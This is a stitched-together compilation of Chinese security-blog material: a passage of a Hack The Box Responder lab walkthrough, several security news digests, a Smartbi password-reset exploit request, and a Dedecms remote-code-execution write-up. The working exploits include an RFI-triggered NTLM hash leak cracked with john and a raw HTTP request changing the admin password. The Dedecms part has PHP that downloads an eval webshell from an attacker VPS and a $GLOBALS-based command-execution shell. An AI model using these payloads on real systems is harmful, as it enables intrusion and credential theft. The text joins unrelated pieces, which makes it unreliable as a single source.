NTLM stand for? NT (New Technology) LAN Manager (NTLM) 查阅Wiki百科就行（可以往下深入了解，这是内网的开始...... TASK 7 Which flag do we use in the Responder utility to specify the network interface? -I 通过上面的帮助文档可以知道 TASK 8 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?. John the Ripper 也是查阅Wiki百科即可 本文的关键操作，可直接跳至此处 接下来将是本文的重点操作： 首先查看一下自身ip（vpn），并开启监听 开启监听：responder -I tun0 -w -d 接着利用web端的远程文件包含漏洞(RFI)访问我自身(10.10.14.115)的任意文件，进行一个Hash泄露 payload： http://unika.htb/index.php?page=//10.10.14.115/somefile Responder就可以捕获到来自受害机(10.129.48.161)带有用户的密码(password)的Hash值 Administrator::RESPONDER:9baf19c29ef21567:761FED4C7E3DB9BCFEF3E747E797B10D:010100000000000000E56ED168C8D901D119B9B66118B37A00000000020008004E0044004200450001001E00570049004E002D004C004C0047004200590033003100340035005800510004003400570049004E002D004C004C004700420059003300310034003500580051002E004E004 将这段字符串保存到一个txt文件中，接下来使用JHON进行一个Hash爆破： john -w=/usr/share/wordlists/rockyou.txt admin.txt 能够获取到Administrator用户的密码为：badminton TASK 9 What is the password for the administrator user? badminton TASK 10 We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on? 5985 使用nmap进行一个开放端口探测即可： nmap -p- --min-rate 1000 -sV 10.129.48.161 拿到用户的账户和密码之后就到了一开始所提到的evil-winRM的使用了 evil-winrm -i 10.129.48.161 -u administrator -p badminton 这样就可以远程登录windows服务器啦，接下来我们能做到的事儿有很多。 第一步肯定是找题目需要的flag 找到我们需要的flag文件只是最基础的，别着急提交，不然就浪费这个练习工具的好机会了 可以多试试几个命令： menu：加载Invoke-Binary和l04d3r-LoadDll函数。当加载ps1时，会显示其所有功能。 download：下载远程文件到本地，如果远程文件在当前目录中，则不需要local_path。 download local_path remote_path 这里可以尝试一下下载flag.txt upload：从本地（kali）上传文件到目标机器，如果本地文件与evil-winrm.rb文件位于同一目录中，则不需要remote_path。 upload local_path remote_path 这里可以试着传一个txt文件 Invoke-Binary：允许在内存中执行从c#编译的exe。该名称可使用tab键自动补全，最多允许3个参数。可执行文件必须在-e参数设置的路径中。 这里由于我在连接时并未指定exe的路径所以这里没法正常执行命令。 services：列出所有服务（无需管理员权限） 加载 powershell 脚本 要加载ps1文件，你只需键入名称（可以使用tab自动补全）。脚本必须位于-s参数中设置的路径中。再次键入menu并查看加载的功能。 这里我没指定路径所以是没有powershell脚本的，所以没法正常演示。 最后 本次的分享就到这儿结束了，当然还有很多的操作和细节没有能够展示到，后续就留给师傅们去探索了。

1、研究人员披露针对npm开发者的供应链攻击活动 https://blog.phylum.io/sophisticated-highly-targeted-attacks-continue-to-plague-npm/ npm 包注册表已成为另一个高度针对性的攻击活动的目标，该攻击活动旨在诱使开发人员下载恶意模块。2023 年 8 月 9 日至 12 日期间，多达 9 个软件包已被确定上传到 npm。其中包括：ws-paso-jssdk、pingan-vue-floating、srm-front-util、cloud-room-video、progress-player 、ynf-core-loader、ynf-core-renderer、 2、攻击者利用测试版应用程序欺骗移动应用程序商店安全审查 https://www.ic3.gov/Media/Y2023/PSA230814 美国联邦调查局 (FBI) 警告网络犯罪分子采用的一种新策略，他们在流行的移动应用商店上推广恶意“测试版”加密货币投资应用程序，然后用于窃取加密货币。攻击者将恶意应用程序作为“测试版”提交到移动应用程序商店，这意味着它们处于早期开发阶段，旨在供技术爱好者或粉丝在软件正式发布之前进行测试并向开发人员提交反馈。这种方法的好处是，测试版应用程序不会经过标准、严格的代码审查流程，而是对其安全性进行表面审查。 3、攻击者入侵基于WordPress漏洞的网站进行钓鱼攻击 https://securelist.com/phishing-with-hacked-sites/110334/ 网络钓鱼攻击者希望他们的虚假页面花费最少的精力，但产生尽可能多的收入，因此他们急切地使用各种工具和技术来逃避检测，并节省时间和金钱。例如网络钓鱼工具包或Telegram 机器人的自动化。另一种攻击者（包括网络钓鱼者）常用的策略是侵入网站并在这些网站上放置恶意内容，而非注册新域名。除了在他们入侵的网站中隐藏网络钓鱼页面外，攻击者还可以窃取服务器上的所有数据并完全破坏网站的运行。 4、印度计算机紧急响应小组对Android 13等多个版本发出高风险警告 https://www.indiatoday.in/technology/news/story/government-alerts-mobile-users-issues-high-risk-warning-for-android-13-and-other-versions-2420682-2023-08-14 印度计算机紧急响应小组 (CERT-In) 已向 Android 用户发出警告。此警告被归类为“高严重性”，涉及在多个版本的 Android 操作系统（包括最新的 Android 13）中发现的多个漏洞。这些漏洞被归类为“高严重性”，可能会被攻击者利用控制易受攻击的设备、窃取敏感信息 5、Monti 勒索软件团伙推出了新的 Linux 加密器 https://securityaffairs.com/149539/cyber-crime/monti-ransomware-news-linux-variant.html Monti 勒索软件运营商在暂停两个月后带着加密器的新 Linux 变体回归。 6、研究人员披露名为QwixxRAT的新型恶意软件 https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram 攻击者通过 Telegram 和 Discord 平台宣传销售一种名为 QwixxRAT 的新型远程访问木马。研究人员发现该恶意软件一旦安装在受害者的 Windows 平台计算机上，就会收集敏感数据，然后将其发送到攻击者的 Telegram 机器人，从而使他们能够未经授权访问受害者的敏感信息。该恶意软件收集网络浏览器历史记录、书签、cookie、信用卡信息、击键、屏幕截图、与某些扩展名匹配的文件以及来自 Steam 和 Telegram 等应用程序的数据。 7、专家警告网络犯罪分子滥用 Cloudflare R2 托管网络钓鱼页面 https://thehackernews.com/2023/08/cybercriminals-abusing-cloudflare-r2.html 过去六个月中，威胁行为者使用 Cloudflare R2 托管网络钓鱼页面的次数增加了 61 倍。Netskope 安全研究员 Jan Michael表示：“大多数网络钓鱼活动都针对 Microsoft 登录凭据，也有一些页面针对 Adobe、Dropbox 和其他云应用程序。” 8、预算超 43 亿元！金融之都纽约发布首个网络安全战略 https://www.secrss.com/articles/57764 美国纽约州州长 Kathy Hochul 推出一项广泛的网络安全战略，拨款 6 亿美元（约合人民币 43.53 亿元）用于保护该州数字和关键基础设施免受网络威胁。 9、福特曝 WiFi 安全漏洞，官方称仍可安全驾驶 https://www.bleepingcomputer.com/news/security/ford-says-cars-with-wifi-vulnerability-still-safe-to-drive/ 福特汽车供应商的安全人员向福特公司报告了一个安全漏洞，漏洞编号 CVE-2023-29468，该漏洞位于汽车信息娱乐系统集成的 WiFi 系统 WL18xx MCP 驱动程序中，允许 WiFi 范围内的攻击者使用特制的帧触发缓冲区溢出。 10、英国政府承包商 MPD FM 泄露员工护照数据 https://securityaffairs.com/149440/security/mpd-fm-data-leak.html 为英国多个政府部门提供服务的设施管理和安全公司 MPD FM 泄露了一个开放实例，暴露了员工护照、签证和其他敏感数据。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 通过查看 Smartbi 的补丁包信息，发现存在漏洞在某种特定情况下修改用户的密码，进行简单的复现和分析 漏洞复现 在页面上修改密码时，需要知道原本的用户对应的密码 直接构造这样的数据包，就不需要知道原本的密码，知道用户名就可以修改密码 POST /smartbi/vision/RMIServlet HTTP/1.1 Host: 192.168.222.133:18080 Content-Length: 73 Cache-Control: max-age=0 If-Modified-Since: 0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Origin: http://192.168.222.133:18080 Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1 Connection: close className=UserService&methodName=changePasswordEx&params=["admin","","1"] 漏洞分析 smartbi.usermanager.ILocalUserManagerModule#changePasswordEx smartbi.usermanager.UserManagerModule#changePasswordEx 修改密码的操作虽然获取了用户名 原本的密码 修改后的新密码，但是对原本的密码并没有做任何校验处理 userId 是根据传入的用户名查询到的 smartbi.usermanager.UserManagerModule#updateUserEx smartbi.usermanager.UserManagerModule#updateUserExtend 漏洞修复 上传补丁包后再发送数据包，发现被拦截 ‍ 匹配到对应的类名和方法就结束执行

1、MaginotDNS攻击利用DNS缓存中毒的弱检查 https://www.blackhat.com/us-23/briefings/schedule/#maginotdns-attacking-the-boundary-of-dns-caching-protection-31901 来自加州大学欧文分校和清华大学的研究人员团队开发了一种名为“MaginotDNS”的新型强大缓存中毒攻击，该攻击针对条件 DNS (CDNS) 解析器，可以危害整个 TLD 顶级域。DNS（域名系统）是一种针对互联网资源和网络的分层分布式命名系统，有助于将人类可读的域名解析为数字 IP 地址，以便建立网络连接。由于不同 DNS 软件和服务器模式（递归解析器和转发 2、苹果设备上的VPN易受到TunnelCrack组合漏洞攻击 https://papers.mathyvanhoef.com/usenix2023-tunnelcrack.pdf TunnelCrack 是 VPN 中两个广泛存在的安全漏洞的组合。攻击者可以利用这些漏洞将流量泄露到 VPN 隧道之外。研究人员测试表明，每个 VPN 产品至少在一台设备上容易受到攻击。研究人员发现，iPhone、iPad、MacBook 和 macOS 上的 VPN 极有可能容易受到攻击，Windows 和 Linux 上的大多数 VPN 都容易受到攻击，Android 是最安全的，大约有四分之一的 VPN 应用程序容易受到攻击。无论 VPN 使用何种安全协议，所发现的漏 3、研究人员披露macOS后台任务管理机制的漏洞 https://www.wired.com/story/apple-mac-background-task-management-flaw/ 研究人员发现 Apple macOS 后台任务管理机制存在漏洞，该机制可能被利用来绕过该公司最近添加的监控工具。Apple 的后台任务管理工具专注于监视软件“持久性”。恶意软件可以设计为短暂的，仅在设备上短暂运行或直到计算机重新启动为止。但它也可以被构建为更深入地建立自身并“坚持”目标，即使计算机关闭并重新启动也是如此。当某些东西持续自行安装时，可能导致任何复杂的恶意软件都可以轻松绕过监控。 4、SugarCRM零日漏洞可被利用以在云端访问密钥 https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/ SugarCRM（CVE-2023-22952）零日身份验证绕过和远程代码执行漏洞是一个典型的漏洞，实际上，防御者需要注意更多内容。由于它是一个 Web 应用程序，如果未正确配置或保护，幕后的基础设施可能会让攻击者扩大其影响。当攻击者了解云服务提供商使用的底层技术时，如果他们能够访问具有正确权限的凭据，攻击者就可以入侵更多的基础设施。 5、CyberPower 和 Dataprobe的九个漏洞使数据中心易遭受黑客攻击 https://securityaffairs.com/149478/security/cyberpower-dcim-pdu-flaws.html CyberPower PowerPanel Enterprise DCIM 平台和 Dataprobe PDU 中的多个漏洞可能会使数据中心遭受黑客攻击。 6、Python URL处理模块urllib存在严重漏洞可导致任意命令执行 https://securityaffairs.com/149447/hacking/python-url-severe-vulnerability.html Python URL解析功能中存在严重漏洞，可被利用实现任意文件读取和命令执行。该问题影响 3.11 之前的所有 python 版本。 7、奥科桌面电话和 Zoom 的零接触配置 (ZTP) 存在多个漏洞 https://securityaffairs.com/149487/hacking/zooms-zero-touch-provisioning-flaws.html 奥科桌面电话和 Zoom 的零接触配置 (ZTP) 中存在多个缺陷，可能会遭受多种攻击。 8、Iagona ScrutisWeb 漏洞可能使 ATM 机遭受远程攻击 https://www.securityweek.com/iagona-scrutisweb-vulnerabilities-could-expose-atms-to-remote-hacking/ 法国公司 Iagona 制造的 ScrutisWeb ATM 机群监控软件中发现的多个漏洞可被用来远程攻击 ATM。 这些安全漏洞是由 Synack Red Team 成员发现的，供应商于 2023 年 7 月发布了 ScrutisWeb 版本 2.1.38，对其进行了修补。 ScrutisWeb 允许组织通过网络浏览器监控银行或零售 ATM 机群，使他们能够快速响应问题。 9、科罗拉多州警告因IBM Moveit 漏洞导致 400 万人数据泄露 https://securityaffairs.com/149498/data-breach/colorado-hcpf-department-data-breach.html 科罗拉多州医疗保健政策和融资部 (HCPF) 披露了 IBM MOVEit 攻击后发生的数据泄露事件。影响超过 400 万人。 10、在 WolfGPT 和 WormGPT 之后，Evil-GPT 出现在黑客论坛上 https://thecyberexpress.com/wolfgpt-wormgpt-evil-gpt-surface-hacker-forum/ 一位用户正在推广“Evil-GPT”的销售，这是一种为恶意使用而制作的生成AI聊天机器人，将其定位为WormGPT的最终替代品。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 刚发现Dedecms更新了发布版本，顺便测试一下之前的day有没有修复，突然想到了新的tricks去实现RCE。 文章发布的时候估计比较晚了，一直没时间写了。 利用 /uploads/dede/article_string_mix.php /uploads/dede/article_template_rand.php /uploads/dede/sys_task.php ...... 我发布的文档->>>>添加文档->>>>站内选择进行文件上传 /uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1) /uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives 文件上传 在vps上起一个http的服务，端口设置为8016 远程服务器存放shell.php，文件内容为 <?php @eval ($_POST ['a']);?> 准备一个图片格式的文件,文件内容为，这里我上传的文件名称为f.png <? copy("http://192.168.225.40:8016/shell.php","shell.php");?> 上传成功后可以看到上传的图片的位置 修改文件名为b.php 保存发现png图片已成功被更改，访问b.php,从远程vps下载了shell.php，当前目录下存在一个名称为shell.php的木马文件 利用webshell进行命令执行。 成功执行了命令 思考 如果不考虑文件上传后缀名绕过方法，仅以上面图片格式的文件上传的话，那么无所谓上传的什么内容，因为本身来讲dede的代码中对文件内容是做的有校验的 所以文件内有两种绕过方法 正则绕过 disable函数绕过 简单搜索了一下各个平台的文章，其实是有师傅正则绕过实现webshell的。第二点儿，disable函数绕过，往前几个版本，有兴趣的可以看一下源码，之前利用全局变量Globals绕过 代码内容 <?php $a = $GLOBALS["_GET"]; $b = $GLOBALS["_GET"]; $a['test1']($b['test2']) ?> 命令执行 http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);&&成功执行命令,且该命令执行为未授权命令执行。 所以在官方前几个版本中已经更新了，添加进了禁用方法 所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy函数的特性，那么这里提醒一下，其它的函数当然也可以满足效果。

1、研究人员披露Lapsus$勒索组织利用SIM交换进行网络攻击 https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf 美国政府分析了 Lapsus$ 勒索组织利用 SIM 交换等简单技术破坏数十个安全态势良好的组织并发布了一份报告。Lapsus$ 是一个组织松散的团体，主要由青少年组成，成员来自英国和巴西，他们在 2021 年至 2022 年间从事活动，目的是为了恶名、经济利益或娱乐。他们还将各种复杂的技术与“创造力的闪光”结合起来。去年 12 月， 在 Lapsus$ 泄露了所谓受害者的专有数据后，发生了一系列归因于或由 Lapsus$ 声称的事件后，对该组织的 2、研究人员披露SystemBC恶意后门新变体DroxiDat https://securelist.com/focus-on-droxidat-systembc/110302/ 研究人员发现部署到关键基础设施目标的SystemBC 后门的新变体DroxiDat。在此次活动中，具有代理功能的后门与 Cobalt Strike 信标一起部署在南非国家的关键基础设施中。DroxiDat有效负载组件是一个不断变化的恶意后门。之前 SystemBC 有效负载中提供的大部分功能已从其代码库中剥离，而该 DroxiDat 恶意软件变体的目的是一个简单的系统分析器，其文件名表明其用例为“syscheck.exe”。它不提供下载和执行功能，但可以与远程侦听器连接并来回传 3、APT29组织伪造德国大使馆PDF文件发起钓鱼攻击 https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs 研究人员观察到针对北约联盟国家外交部的两份 PDF 文档。这些 PDF 文件伪装成来自德国大使馆，并包含两个外交邀请诱饵文件。其中一个 PDF 提供了 Duke 的变种，这是一种与俄罗斯国家资助的 APT29 网络间谍活动相关的恶意软件。另一个文件很可能用于测试或侦察，因为它不包含有效负载，但如果受害者打开电子邮件附件，则会通知攻击者。APT29使用 4、AdLoad恶意软件针对Mac系统进行网络攻击 https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload AdLoad 恶意软件在 2017 年首次出现多年后，仍在感染 Mac 系统。AdLoad 是一个软件包捆绑器，据观察，它在其存在期间提供了广泛的有效负载。研究人员在对其最新有效负载进行调查期间发现，AdLoad 在过去一年中删除的最常见组件是代理应用程序，该代理应用程序将 MacOS AdLoad 受害者变成一个巨大的住宅代理僵尸网络。 5、CODESYS SDK多个漏洞可被利用使OT技术环境面临远程攻击 https://www.microsoft.com/en-us/security/blog/2023/08/10/multiple-high-severity-vulnerabilities-in-codesys-v3-sdk-could-lead-to-rce-or-dos/ CODESYS V3软件开发套件 (SDK)中披露了一组 16 个高严重性安全漏洞，这些漏洞可能导致特定条件下的远程代码执行和拒绝服务，从而给运营技术 (OT) 环境带来风险。这些漏洞从追踪为 CVE-2022-47378 到 CVE-2022-47393，被称为CoDe16，CVSS 评分为 8.8，但 CVE-2 6、Avada WordPress主题和插件中存在多个漏洞 https://www.infosecurity-magazine.com/news/flaws-wordpress-avada-theme-plugin/ Avada 主题及其随附的 Avada Builder 插件中已发现多个漏洞。安全研究员发现的这些安全漏洞使大量 WordPress 网站面临潜在的漏洞。在这些漏洞中，Avada Builder 插件存在两个。第一个是经过身份验证的 SQL 注入 (CVE-2023-39309)。利用此漏洞，拥有经过身份验证的访问权限的攻击者可能会破坏敏感数据并可能执行远程代码。第二个是反射跨站脚本 (XSS) 漏洞 (CVE-2023-39306)， 7、LOLEKHosted管理员因协助Netwalker勒索软件组织被捕 https://www.bleepingcomputer.com/news/security/lolekhosted-admin-arrested-for-aiding-netwalker-ransomware-gang/ 警方已经控制了 Lolek 防弹托管提供商，逮捕了五个人并没收了涉嫌为 Netwalker 勒索软件攻击和其他恶意活动提供便利的服务器。防弹托管提供商是一家对其服务器上的犯罪活动或托管受版权保护材料的报告视而不见的托管公司。与传统公司相比，网络犯罪分子更喜欢这些类型的托管提供商，因为他们可以发起网络犯罪活动，而不必担心在报告恶意活动后他们会被关闭。 8、奥科桌面电话和Zoom ZTP存在多个漏洞可导致用户遭遇窃听 https://blog.syss.com/posts/zero-touch-pwn/ 奥科桌面电话和 Zoom 的零接触配置 ( ZTP )中已披露多个安全漏洞，恶意攻击者可能利用这些漏洞进行远程攻击。外部攻击者利用奥科桌面电话和 Zoom 零接触配置功能中发现的漏洞，可以获得对设备的完全远程控制。然后，不受限制的访问可以被武器化，以窃听房间或电话、通过设备进行攻击并攻击公司网络，甚至构建受感染设备的僵尸网络。 9、福特汽车称存在 WiFi 漏洞的汽车仍可安全驾驶 https://www.bleepingcomputer.com/news/security/ford-says-cars-with-wifi-vulnerability-still-safe-to-drive/ 福特警告称，许多福特和林肯汽车所使用的 SYNC3 信息娱乐系统存在缓冲区溢出漏洞，该漏洞可能允许远程执行代码，但表示车辆驾驶安全不会受到影响。SYNC3 是一款现代信息娱乐系统，支持车载 WiFi 热点、电话连接、语音命令、第三方应用程序等。该漏洞被追踪为 CVE-2023-29468，位于汽车信息娱乐系统中集成的 WiFi 子系统的 WL18xx MCP 驱动程序中，该漏洞允许 10、CyberPower和 Dataprobe产品的多个漏洞使数据中心面临风险 https://thehackernews.com/2023/08/multiple-flaws-in-cyberpower-and.html 影响 CyberPower 的 PowerPanel 企业数据中心基础设施管理 (DCIM) 平台和 Dataprobe 的 iBoot 配电单元 (PDU) 的多个安全漏洞可能会被利用来获得对这些系统的未经身份验证的访问，并在目标环境中造成灾难性损坏。这九个漏洞（从 CVE-2023-3259 到 CVE-2023-3267）的严重程度评分从 6.7 到 9.8 不等，使威胁行为者能够关闭整个数据中心并破坏数据中心部署，以窃取数据或大规模发动大规模 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。